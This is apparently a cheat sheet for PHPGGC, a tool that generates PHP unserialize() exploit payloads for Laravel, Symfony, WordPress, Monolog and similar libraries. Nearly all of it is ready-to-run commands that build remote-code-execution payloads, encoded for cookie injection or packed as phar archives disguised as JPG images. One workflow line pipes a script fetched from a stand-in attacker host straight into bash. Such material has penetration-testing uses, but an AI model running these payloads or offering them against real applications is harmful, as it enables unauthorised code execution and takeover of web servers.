Description
PHPGGC (PHP Generic Gadget Chains) generates payloads that exploit unsafe PHP unserialize() calls. It provides pre-built gadget chains for common PHP frameworks and libraries including Laravel, Symfony, WordPress, Magento, Doctrine, and Guzzle.
Installation
BASH
git clone https://github.com/ambionics/phpggc.git
cd phpggcBasic Usage
BASH
# List all available gadget chains
./phpggc -l
# Generate Laravel RCE payload
./phpggc Laravel/RCE1 system "id" -o payload.ser
# Generate Symfony RCE
./phpggc Symfony/RCE1 "system" "whoami"Advanced Usage
BASH
# Base64 output (for cookie injection)
./phpggc Laravel/RCE1 system "id" -b
# URL-encoded output
./phpggc Laravel/RCE1 system "id" -u
# JSON-safe output
./phpggc Laravel/RCE1 system "id" -j
# Phar archive generation (for phar:// deserialization)
./phpggc Laravel/RCE1 system "id" -p phar -o exploit.phar
# Fast destruct (triggers __destruct immediately)
./phpggc Monolog/RCE1 system "id" --fast-destruct
# ASCII strings only
./phpggc Laravel/RCE1 system "id" -aSupported Frameworks
TEXT
Laravel — RCE, file write, file delete
Symfony — RCE, file write
WordPress — File write, RCE
Magento — RCE, SQL injection
Doctrine — RCE, file write
Guzzle — RCE, SSRF
Monolog — RCE, file write
SlimPHP — RCE
Yii — RCE, file write
CakePHP — File deleteCommon Workflows
BASH
# Laravel insecure deserialization
# If APP_KEY is known:
./phpggc Laravel/RCE1 system "curl http://attacker.com/shell.sh | bash" -b
# Inject into encrypted cookie
# Phar deserialization (file upload → RCE)
./phpggc Monolog/RCE1 system "id" -p phar -o exploit.jpg
# Upload as image, trigger with phar://uploads/exploit.jpg
# WordPress plugin deserialization
./phpggc WordPress/RCE1 system "id" -b